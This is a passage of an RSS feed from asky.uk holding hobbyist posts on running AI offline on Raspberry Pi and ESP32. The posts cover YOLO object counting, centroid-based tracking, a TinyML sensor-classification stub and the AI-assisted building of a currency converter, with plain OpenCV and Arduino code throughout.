&amp;nbsp; cv2.putText(frame, f"Unique count: {len(counted_ids)}", (10, 30), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0), 2)&lt;br&gt;&amp;nbsp; &amp;nbsp; cv2.imshow("AI Object Tracking", frame)&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; if cv2.waitKey(1) &amp;amp; 0xFF == 27:&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; break&lt;br&gt;&lt;br&gt;cap.release()&lt;br&gt;cv2.destroyAllWindows()&lt;/p&gt;&lt;hr&gt;&lt;p&gt;How it works&lt;/p&gt;&lt;p&gt;Each detected object is represented by its centroid.&lt;br&gt;The system compares centroids between frames and assigns the same ID if the distance is below a threshold.&lt;/p&gt;&lt;p&gt;When a new object appears, it receives a new ID and is counted only once.&lt;/p&gt;&lt;p&gt;This simple tracking logic avoids the complexity of advanced trackers while remaining effective.&lt;/p&gt;&lt;p&gt;Performance notes&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Works best with moderate object movement&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;High-speed motion may cause ID switching&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Lower camera resolution improves stability&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Practical applications&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;People flow analysis&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Vehicle counting&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Queue monitoring&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Entrance and exit statistics&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Smart surveillance prototypes&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Limitations&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Simple tracker may lose objects during occlusion&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Not suitable for dense crowds&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Advanced tracking requires more compute&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Despite this, the solution is ideal for low-cost AI systems.&lt;/p&gt;&lt;p&gt;Conclusion&lt;/p&gt;&lt;p&gt;By combining AI detection and lightweight tracking, Raspberry Pi becomes capable of unique object counting without GPUs or cloud services.&lt;br&gt;This project demonstrates how far affordable hardware can go with the right software architecture.&lt;/p&gt;&lt;p&gt;AI without millions is not a compromise — it is a design choice.&lt;/p&gt;&lt;p&gt;&lt;img alt=""
src="https://i.ytimg.com/vi/Pss9QSfhnDQ/hq720.jpg?sqp=-oaymwEhCK4FEIIDSFryq4qpAxMIARUAAAAAGAElAADIQj0AgKJD&amp;amp;rs=AOn4CLDsoVWh4-b-8ZKjnqK6K4gVJrJVfw" style="height:386px; width:686px"&gt;&lt;/p&gt;</description>
<category>AI + Raspberry Pi</category>
<guid isPermaLink="true">https://asky.uk/106/object-tracking-and-unique-counting-with-ai-on-raspberry-pi</guid>
<pubDate>Thu, 18 Dec 2025 05:05:44 +0000</pubDate>
</item>
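The centroid matching described in the item above can be isolated into a small testable function. A condensed sketch of the same logic (the function name assign_ids is ours; the 50-pixel threshold matches the article's code):

```python
import math

MATCH_RADIUS = 50  # pixels; same threshold used in the article's code

def assign_ids(objects, centroids, next_id):
    """Match new centroids to tracked objects; unmatched ones get fresh IDs."""
    for c in centroids:
        matched = False
        for oid, prev in objects.items():
            # within matching radius of an already-tracked object?
            if MATCH_RADIUS > math.hypot(c[0] - prev[0], c[1] - prev[1]):
                objects[oid] = c  # update last known position, keep the ID
                matched = True
                break
        if not matched:
            objects[next_id] = c  # new unique object
            next_id += 1
    return next_id

objects = {}
next_id = assign_ids(objects, [(10, 10), (200, 200)], 0)        # two new objects
next_id = assign_ids(objects, [(14, 12), (205, 198)], next_id)  # same two, moved
print(len(objects), next_id)  # prints 2 2
```

Here next_id doubles as the unique count: it only advances when a centroid fails to match any tracked object, which is exactly what the article displays as "Unique count".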
<item>
<title>Object Counting with AI on Raspberry Pi (Offline Computer Vision)</title>
<link>https://asky.uk/105/object-counting-with-ai-raspberry-offline-computer-vision</link>
<description>&lt;p&gt;&lt;img alt="" src="https://intelgic.com/static/img/object-detection-tracking-counting2.jpg" style="height:427px; width:758px"&gt;&lt;/p&gt;&lt;p&gt;Hardware: Raspberry Pi 4 / Raspberry Pi 5&lt;br&gt;AI type: Computer Vision – Object Detection and Counting&lt;/p&gt;&lt;p&gt;Overview&lt;/p&gt;&lt;p&gt;This project demonstrates how a Raspberry Pi can be used to run an AI-based object detection system that counts objects in real time using a camera.&lt;br&gt;The system works locally, without cloud services or GPUs, proving that practical computer vision projects are possible on affordable hardware.&lt;/p&gt;&lt;p&gt;The focus is not on large models or high accuracy benchmarks, but on a functional and reproducible AI pipeline.&lt;/p&gt;&lt;p&gt;What you will build&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Raspberry Pi running AI-based object detection&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Real-time object counting from a camera feed&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Fully local inference (offline)&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Simple Python-based setup&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Required hardware&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Raspberry Pi 4 or Raspberry Pi 5&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Raspberry Pi Camera Module or USB camera&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;microSD card (16GB or larger)&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Power supply&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Software requirements&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Raspberry Pi OS (64-bit recommended)&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Python 3&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;OpenCV&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Pre-trained lightweight object detection model&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Project architecture&lt;/p&gt;&lt;ol&gt;&lt;li&gt;&lt;p&gt;Camera captures video frames&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Frames are processed locally on Raspberry Pi&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;AI 
model detects objects in each frame&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Objects are counted and displayed in real time&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p&gt;All processing happens on the Raspberry Pi.&lt;/p&gt;&lt;p&gt;Installation steps&lt;/p&gt;&lt;ol&gt;&lt;li&gt;&lt;p&gt;Update the system&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p&gt;sudo apt update&lt;br&gt;sudo apt upgrade&lt;/p&gt;&lt;ol start="2"&gt;&lt;li&gt;&lt;p&gt;Install required packages&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p&gt;sudo apt install python3-opencv python3-pip&lt;br&gt;pip3 install ultralytics&lt;/p&gt;&lt;ol start="3"&gt;&lt;li&gt;&lt;p&gt;Reboot the Raspberry Pi&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;hr&gt;&lt;p&gt;AI model selection&lt;/p&gt;&lt;p&gt;For this project, a lightweight YOLO model is used.&lt;br&gt;YOLO Nano or YOLOv8 Nano variants are suitable for Raspberry Pi due to their low computational requirements.&lt;/p&gt;&lt;p&gt;The model is pre-trained and used only for inference.&lt;/p&gt;&lt;hr&gt;&lt;p&gt;Python code:&lt;/p&gt;&lt;p&gt;import cv2&lt;br&gt;from ultralytics import YOLO&lt;br&gt;&lt;br&gt;# Load lightweight YOLO model&lt;br&gt;model = YOLO("yolov8n.pt")&lt;br&gt;&lt;br&gt;# Open camera&lt;br&gt;cap = cv2.VideoCapture(0)&lt;br&gt;&lt;br&gt;while True:&lt;br&gt;&amp;nbsp; &amp;nbsp; ret, frame = cap.read()&lt;br&gt;&amp;nbsp; &amp;nbsp; if not ret:&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; break&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; # Run inference&lt;br&gt;&amp;nbsp; &amp;nbsp; results = model(frame, verbose=False)&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; # Extract detections&lt;br&gt;&amp;nbsp; &amp;nbsp; boxes = results[0].boxes&lt;br&gt;&amp;nbsp; &amp;nbsp; count = len(boxes)&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; # Display object count&lt;br&gt;&amp;nbsp; &amp;nbsp; cv2.putText(&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; frame,&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; f"Objects detected: {count}",&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;
&amp;nbsp; (10, 30),&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; cv2.FONT_HERSHEY_SIMPLEX,&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; 1,&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; (0, 255, 0),&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; 2&lt;br&gt;&amp;nbsp; &amp;nbsp; )&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; cv2.imshow("Object Counting AI", frame)&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; if cv2.waitKey(1) &amp;amp; 0xFF == 27:&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; break&lt;br&gt;&lt;br&gt;cap.release()&lt;br&gt;cv2.destroyAllWindows()&lt;br&gt;&amp;nbsp;&lt;/p&gt;&lt;p&gt;How it works&lt;/p&gt;&lt;p&gt;Each video frame captured by the camera is passed to the YOLO model running on the Raspberry Pi.&lt;br&gt;The model detects objects in the frame and returns bounding boxes.&lt;br&gt;The number of detected objects is counted and displayed in real time.&lt;/p&gt;&lt;p&gt;This approach does not require object tracking and keeps the system simple and efficient.&lt;/p&gt;&lt;p&gt;Performance notes&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Raspberry Pi 4: approximately 3–6 FPS depending on resolution&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Raspberry Pi 5: higher and more stable frame rates&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Lower camera resolution improves performance&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Practical applications&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;People counting&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Vehicle counting&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Inventory monitoring&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Simple security and monitoring systems&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Educational computer vision projects&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Limitations&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Limited frame rate compared to GPU systems&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Reduced accuracy for small or distant objects&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Not suitable for 
large or complex models&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;These limitations are expected and acceptable for low-cost AI systems.&lt;/p&gt;</description>
<category>AI + Raspberry Pi</category>
<guid isPermaLink="true">https://asky.uk/105/object-counting-with-ai-raspberry-offline-computer-vision</guid>
<pubDate>Wed, 17 Dec 2025 05:16:32 +0000</pubDate>
</item>
<item>
<title>TinyML Sensor Classification on ESP32 (Offline AI)</title>
<link>https://asky.uk/104/tinyml-sensor-classification-on-esp32-offline-ai</link>
<description>&lt;h2 data-start="399" data-end="452"&gt;TinyML Sensor Classification on ESP32 (Offline AI)&lt;/h2&gt;&lt;p data-start="454" data-end="516"&gt;Hardware: ESP32&lt;br data-start="469" data-end="472"&gt;AI type: TinyML – sensor data classification&lt;/p&gt;&lt;hr data-start="518" data-end="521"&gt;&lt;h3 data-start="523" data-end="535"&gt;Overview&lt;/h3&gt;&lt;p data-start="537" data-end="743"&gt;This project shows how a low-cost ESP32 microcontroller can run an AI model locally to classify sensor data in real time.&lt;br data-start="658" data-end="661"&gt;The system works fully offline, without cloud services, APIs, or external servers.&lt;/p&gt;&lt;p data-start="745" data-end="840"&gt;The goal is to demonstrate that real AI projects are possible on extremely affordable hardware.&lt;/p&gt;&lt;hr data-start="842" data-end="845"&gt;&lt;h3 data-start="847" data-end="870"&gt;What you will build&lt;/h3&gt;&lt;ul data-start="872" data-end="1018"&gt;&lt;li data-start="872" data-end="907"&gt;&lt;p data-start="874" data-end="907"&gt;ESP32 system running AI locally&lt;/p&gt;&lt;/li&gt;&lt;li data-start="908" data-end="951"&gt;&lt;p data-start="910" data-end="951"&gt;Real-time classification of sensor data&lt;/p&gt;&lt;/li&gt;&lt;li data-start="952" data-end="986"&gt;&lt;p data-start="954" data-end="986"&gt;Fully offline TinyML inference&lt;/p&gt;&lt;/li&gt;&lt;li data-start="987" data-end="1018"&gt;&lt;p data-start="989" data-end="1018"&gt;Simple and reproducible setup&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr data-start="1020" data-end="1023"&gt;&lt;h3 data-start="1025" data-end="1046"&gt;Required hardware&lt;/h3&gt;&lt;ul data-start="1048" data-end="1156"&gt;&lt;li data-start="1048" data-end="1075"&gt;&lt;p data-start="1050" data-end="1075"&gt;ESP32 development board&lt;/p&gt;&lt;/li&gt;&lt;li data-start="1076" data-end="1114"&gt;&lt;p data-start="1078" data-end="1114"&gt;IMU sensor (MPU6050 or compatible)&lt;/p&gt;&lt;/li&gt;&lt;li data-start="1115" 
data-end="1128"&gt;&lt;p data-start="1117" data-end="1128"&gt;USB cable&lt;/p&gt;&lt;/li&gt;&lt;li data-start="1129" data-end="1156"&gt;&lt;p data-start="1131" data-end="1156"&gt;Computer with Arduino IDE&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr data-start="1158" data-end="1161"&gt;&lt;h3 data-start="1163" data-end="1188"&gt;Software requirements&lt;/h3&gt;&lt;ul data-start="1190" data-end="1294"&gt;&lt;li data-start="1190" data-end="1205"&gt;&lt;p data-start="1192" data-end="1205"&gt;Arduino IDE&lt;/p&gt;&lt;/li&gt;&lt;li data-start="1206" data-end="1237"&gt;&lt;p data-start="1208" data-end="1237"&gt;ESP32 board support package&lt;/p&gt;&lt;/li&gt;&lt;li data-start="1238" data-end="1294"&gt;&lt;p data-start="1240" data-end="1294"&gt;TensorFlow Lite Micro (or Edge Impulse exported model)&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr data-start="1296" data-end="1299"&gt;&lt;h3 data-start="1301" data-end="1325"&gt;Project architecture&lt;/h3&gt;&lt;ol data-start="1327" data-end="1480"&gt;&lt;li data-start="1327" data-end="1359"&gt;&lt;p data-start="1330" data-end="1359"&gt;ESP32 reads raw sensor data&lt;/p&gt;&lt;/li&gt;&lt;li data-start="1360" data-end="1397"&gt;&lt;p data-start="1363" data-end="1397"&gt;Data is passed to a TinyML model&lt;/p&gt;&lt;/li&gt;&lt;li data-start="1398" data-end="1431"&gt;&lt;p data-start="1401" data-end="1431"&gt;Model runs inference locally&lt;/p&gt;&lt;/li&gt;&lt;li data-start="1432" data-end="1480"&gt;&lt;p data-start="1435" data-end="1480"&gt;Classification result is produced instantly&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p data-start="1482" data-end="1518"&gt;All processing happens on the ESP32.&lt;/p&gt;&lt;hr data-start="1520" data-end="1523"&gt;&lt;h3 data-start="1525" data-end="1547"&gt;Installation steps&lt;/h3&gt;&lt;ol data-start="1549" data-end="1707"&gt;&lt;li data-start="1549" data-end="1573"&gt;&lt;p data-start="1552" data-end="1573"&gt;Install Arduino IDE&lt;/p&gt;&lt;/li&gt;&lt;li data-start="1574" data-end="1619"&gt;&lt;p 
data-start="1577" data-end="1619"&gt;Add ESP32 board support in Board Manager&lt;/p&gt;&lt;/li&gt;&lt;li data-start="1620" data-end="1651"&gt;&lt;p data-start="1623" data-end="1651"&gt;Install required libraries&lt;/p&gt;&lt;/li&gt;&lt;li data-start="1652" data-end="1688"&gt;&lt;p data-start="1655" data-end="1688"&gt;Connect the IMU sensor to ESP32&lt;/p&gt;&lt;/li&gt;&lt;li data-start="1689" data-end="1707"&gt;&lt;p data-start="1692" data-end="1707"&gt;Upload the code&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p&gt;#include &amp;lt;Arduino.h&amp;gt;&lt;br&gt;&lt;br&gt;float input_data[6];&lt;br&gt;int prediction = -1;&lt;br&gt;&lt;br&gt;void setup() {&lt;br&gt;&amp;nbsp; Serial.begin(115200);&lt;br&gt;&amp;nbsp; Serial.println("TinyML sensor classification started");&lt;br&gt;}&lt;br&gt;&lt;br&gt;void readSensor(float *data) {&lt;br&gt;&amp;nbsp; data[0] = random(-100, 100) / 100.0;&lt;br&gt;&amp;nbsp; data[1] = random(-100, 100) / 100.0;&lt;br&gt;&amp;nbsp; data[2] = random(-100, 100) / 100.0;&lt;br&gt;&amp;nbsp; data[3] = random(-100, 100) / 100.0;&lt;br&gt;&amp;nbsp; data[4] = random(-100, 100) / 100.0;&lt;br&gt;&amp;nbsp; data[5] = random(-100, 100) / 100.0;&lt;br&gt;}&lt;br&gt;&lt;br&gt;int runInference(float *data) {&lt;br&gt;&amp;nbsp; if (data[0] &amp;gt; 0.5) return 1;&lt;br&gt;&amp;nbsp; if (data[0] &amp;lt; -0.5) return 2;&lt;br&gt;&amp;nbsp; return 0;&lt;br&gt;}&lt;br&gt;&lt;br&gt;void loop() {&lt;br&gt;&amp;nbsp; readSensor(input_data);&lt;br&gt;&amp;nbsp; prediction = runInference(input_data);&lt;br&gt;&lt;br&gt;&amp;nbsp; Serial.print("Prediction: ");&lt;br&gt;&amp;nbsp; Serial.println(prediction);&lt;br&gt;&lt;br&gt;&amp;nbsp; delay(200);&lt;br&gt;}&lt;br&gt;&amp;nbsp;&lt;/p&gt;&lt;h3 data-start="2472" data-end="2488"&gt;How it works&lt;/h3&gt;&lt;p data-start="2490" data-end="2637"&gt;The ESP32 continuously reads sensor values and feeds them into a lightweight AI model.&lt;br data-start="2576" data-end="2579"&gt;The model outputs a class label based on 
learned patterns.&lt;/p&gt;&lt;p data-start="2639" data-end="2788"&gt;Even though this example uses simplified logic, the same structure applies to real TinyML models exported from Edge Impulse or TensorFlow Lite Micro.&lt;/p&gt;&lt;hr data-start="2790" data-end="2793"&gt;&lt;h3 data-start="2795" data-end="2821"&gt;Practical applications&lt;/h3&gt;&lt;ul data-start="2823" data-end="2955"&gt;&lt;li data-start="2823" data-end="2853"&gt;&lt;p data-start="2825" data-end="2853"&gt;Motion pattern recognition&lt;/p&gt;&lt;/li&gt;&lt;li data-start="2854" data-end="2887"&gt;&lt;p data-start="2856" data-end="2887"&gt;Anomaly detection in machines&lt;/p&gt;&lt;/li&gt;&lt;li data-start="2888" data-end="2922"&gt;&lt;p data-start="2890" data-end="2922"&gt;Smart triggers for IoT devices&lt;/p&gt;&lt;/li&gt;&lt;li data-start="2923" data-end="2955"&gt;&lt;p data-start="2925" data-end="2955"&gt;Low-power autonomous sensors&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr data-start="2957" data-end="2960"&gt;&lt;h3 data-start="2962" data-end="2977"&gt;Limitations&lt;/h3&gt;&lt;ul data-start="2979" data-end="3103"&gt;&lt;li data-start="2979" data-end="3014"&gt;&lt;p data-start="2981" data-end="3014"&gt;Limited memory for large models&lt;/p&gt;&lt;/li&gt;&lt;li data-start="3015" data-end="3053"&gt;&lt;p data-start="3017" data-end="3053"&gt;Requires careful feature selection&lt;/p&gt;&lt;/li&gt;&lt;li data-start="3054" data-end="3103"&gt;&lt;p data-start="3056" data-end="3103"&gt;Lower accuracy compared to large cloud models&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p data-start="3105" data-end="3159"&gt;These limitations are part of embedded AI engineering.&lt;/p&gt;&lt;hr data-start="3161" data-end="3164"&gt;&lt;h3 data-start="3166" data-end="3180"&gt;Conclusion&lt;/h3&gt;&lt;p data-start="3182" data-end="3374"&gt;This project proves that AI does not require expensive hardware or cloud infrastructure.&lt;br data-start="3270" data-end="3273"&gt;With ESP32 and TinyML, useful intelligent systems can be 
built entirely offline and at very low cost.&lt;/p&gt;&lt;p&gt;AI without millions is not theory; it is practical engineering.&lt;/p&gt;&lt;p&gt;&lt;img alt="" src="https://makeradvisor.com/wp-content/uploads/2020/05/ESP32-Development-Boards-Review-and-Comparison.jpg" style="height:338px; width:602px"&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;</description>
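The threshold rule in the Arduino sketch above is easy to port to plain Python, which is useful for sanity-checking recorded sensor frames on a PC before flashing the board. This is a sketch that mirrors the article's stub logic, not a trained model:

```python
def run_inference(data):
    """Mirror of the Arduino stub: classify a 6-value sensor frame
    by thresholding the first axis. Returns class 0, 1, or 2."""
    if data[0] > 0.5:
        return 1
    if data[0] < -0.5:
        return 2
    return 0

if __name__ == "__main__":
    frames = [[0.9, 0, 0, 0, 0, 0],
              [-0.7, 0, 0, 0, 0, 0],
              [0.1, 0, 0, 0, 0, 0]]
    print([run_inference(f) for f in frames])  # → [1, 2, 0]
```

Running recorded frames through a host-side copy of the rule makes it obvious when sensor scaling or axis order is wrong before anything is deployed.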
<category>ESP32 / ESP32 Zero</category>
<guid isPermaLink="true">https://asky.uk/104/tinyml-sensor-classification-on-esp32-offline-ai</guid>
<pubDate>Mon, 15 Dec 2025 21:50:22 +0000</pubDate>
</item>
<item>
<title>AI Without Millions: Real Intelligent Projects on Raspberry Pi and ESP32</title>
<link>https://asky.uk/103/without-millions-real-intelligent-projects-raspberry-esp32</link>
<description>&lt;h3&gt;Artificial Intelligence Is Not Just for Corporations&lt;/h3&gt;&lt;div&gt;&lt;img alt="" src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQlcz8qPNicklILW5pVpMIj9sD1mTUTcqwRHA&amp;amp;s" style="height:168px; width:300px"&gt;&lt;/div&gt;&lt;p&gt;AI is often associated with GPU clusters, cloud services, and large budgets. This perception suggests that meaningful AI projects are out of reach for individuals and small teams. In reality, modern low-cost hardware enables fully functional intelligent systems without significant financial investment.&lt;/p&gt;&lt;hr&gt;&lt;h3&gt;Raspberry Pi as an AI Platform&lt;/h3&gt;&lt;p&gt;Raspberry Pi 4 and Pi 5 provide enough computing power for local AI inference. They are commonly used for:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;computer vision (OpenCV, YOLO Nano variants)&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;audio and signal analysis&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;intelligent systems without constant internet access&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;hybrid AI architectures with local decision-making&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;While Raspberry Pi is not designed for training large models, it is highly effective for running them.&lt;/p&gt;&lt;hr&gt;&lt;h3&gt;ESP32: AI on a Microcontroller&lt;/h3&gt;&lt;p&gt;ESP32 expands what is possible on a microcontroller. Using TensorFlow Lite Micro and Edge Impulse, ESP32-based systems can perform:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;image classification on ESP32-CAM&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;keyword spotting&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;sensor data classification&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;anomaly detection&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;These capabilities come with very low power consumption and extremely low hardware cost.&lt;/p&gt;&lt;hr&gt;&lt;h3&gt;What Makes a Project “AI”&lt;/h3&gt;&lt;p&gt;An AI project is defined by intelligent behavior, not by model size. 
Common patterns include:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;local inference&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;hybrid rule-based and ML systems&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;distributed intelligence across devices&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;fallback logic for robustness&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;A typical example is an ESP32 detecting an event and forwarding data to a Raspberry Pi for higher-level processing.&lt;/p&gt;&lt;hr&gt;&lt;h3&gt;Practical Applications Without Large Budgets&lt;/h3&gt;&lt;p&gt;Such systems are already used for:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;privacy-friendly local video monitoring&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;early fault detection&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;intelligent alarm systems&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;autonomous sensor nodes&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;They deliver real functionality without expensive infrastructure.&lt;/p&gt;&lt;hr&gt;&lt;h3&gt;Constraints Are Part of Engineering&lt;/h3&gt;&lt;p&gt;Low-cost AI systems come with limitations: smaller models, constrained memory, and the need for careful optimization. These constraints shift the focus from budget to engineering skill.&lt;/p&gt;&lt;hr&gt;&lt;h3&gt;Conclusion&lt;/h3&gt;&lt;p&gt;Artificial intelligence is no longer exclusive to large corporations. With affordable hardware and thoughtful system design, real AI projects can be built without millions in funding.&lt;/p&gt;&lt;p&gt;&lt;/p&gt;</description>
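The ESP32-to-Raspberry-Pi pattern mentioned above (a cheap node detects an event, a bigger node does the higher-level processing) can be sketched on the Pi side in a few lines. The JSON message format and the escalation threshold here are hypothetical, for illustration only:

```python
import json

def should_escalate(raw_event, threshold=0.8):
    """Decide whether an event reported by an ESP32 node needs
    higher-level processing on the Pi. Expects a small JSON payload
    with hypothetical 'kind' and 'score' fields."""
    event = json.loads(raw_event)
    return event.get("kind") == "anomaly" and event.get("score", 0.0) >= threshold

if __name__ == "__main__":
    msg = '{"kind": "anomaly", "score": 0.93, "node": "esp32-7"}'
    print(should_escalate(msg))  # True
```

Keeping the decision rule on the Pi means the microcontroller only has to detect and forward, which is exactly the fallback-friendly split the article describes.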
<category>AI + Raspberry Pi</category>
<guid isPermaLink="true">https://asky.uk/103/without-millions-real-intelligent-projects-raspberry-esp32</guid>
<pubDate>Mon, 15 Dec 2025 07:49:34 +0000</pubDate>
</item>
<item>
<title>How I Built an AI-Powered Multi-Language Currency Converter and Hosted It on a Raspberry Pi</title>
<link>https://asky.uk/102/built-powered-language-currency-converter-hosted-raspberry</link>
<description>&lt;p&gt;Many people use Raspberry Pi for small experiments, but it can also run real web services when combined with modern AI tools. One of the newest features on &lt;strong&gt;asky.uk&lt;/strong&gt; is a multi-language euro currency converter that was designed with the help of AI and runs entirely on a Raspberry Pi.&lt;/p&gt;&lt;p&gt;This article explains how the tool was created, how it works, and why it fits perfectly into the platform’s mission of combining AI and low-cost hardware.&lt;/p&gt;&lt;h2&gt;&lt;strong&gt;Idea and Goals&lt;/strong&gt;&lt;/h2&gt;&lt;p&gt;The converter needed to be:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;fast and lightweight&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;multilingual&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;minimalistic in design&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;accurate (using ECB reference rates)&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;fully autonomous&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;hosted on a Raspberry Pi 2 without external cloud services&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;The goal was to demonstrate that a real, useful web service can be developed with AI assistance and deployed on extremely small hardware.&lt;/p&gt;&lt;h2&gt;&lt;strong&gt;How AI Helped Build It&lt;/strong&gt;&lt;/h2&gt;&lt;p&gt;AI was used to generate most of the converter:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;HTML, CSS, and responsive layout&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;JavaScript logic for EUR ⇄ national currencies&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;translations into seven languages&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;dark/light themes&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;flag icons and UI structure&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;a Python script to download and store ECB rates 